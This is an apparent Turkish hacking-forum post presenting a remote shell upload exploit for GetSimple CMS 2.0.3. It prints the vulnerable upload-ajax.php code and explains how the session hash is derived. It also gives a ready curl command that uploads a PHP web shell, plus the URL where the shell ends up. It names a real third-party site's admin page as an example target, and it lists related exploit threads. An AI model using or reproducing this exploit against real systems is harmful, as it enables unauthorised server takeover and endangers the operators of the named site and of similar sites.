Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day
#1
Kod:
Website Yazarı => http://reflective.noblogs.org (OWL?)
Türkçe Anlatım => KingSkrupellos - Cyberizm.Org
Yazılım Linki => http://get-simple.info/
Açıktan etkilenen versiyon => 2.0.3
Bug Code:
getsimple/admin/upload-ajax.php

if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(&lsquo;//&rsquo;,'/&rsquo;,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);

Generating SESSIONHASH: md5( $salt. $sitename)


[XPL]
curl -F &ldquo;Filedata=@yourshell.txt;filename=shell.php&rdquo; http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO

SHELL Adresiniz =>
http://getsimple_localhost/data/uploads/shell.php

Örnek Site => http://www.runningillustrated.com/admin/

İngilizce Kaynak => http://www.bugsearch.net/en/11428/getsimple-cms-203-remote-upload-shell-upload-ajaxphp-0day.html
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 183 Dün, Saat: 18:42
Son Yorum: the_zizil
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 5 109 04-12-2016, Saat: 12:21
Son Yorum: antisecureman
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 537 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 11 208 30-11-2016, Saat: 16:56
Son Yorum: xApocalypse
  Website by Raw Marketing Editor Asset Dosya Yükleme Açığı KingSkrupellos 7 122 30-11-2016, Saat: 08:48
Son Yorum: the_zizil
Anahtar Kelimeler

GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day indir, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Videosu, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Online izle, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Bedava indir, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Yükle, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Hakkında, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Nedir, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Free indir, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Oyunu, GetSimple CMS <=2.03 Uzaktan Shell Yükleme Açığı (Upload-Ajax.php) 0day Download


1 Ziyaretçi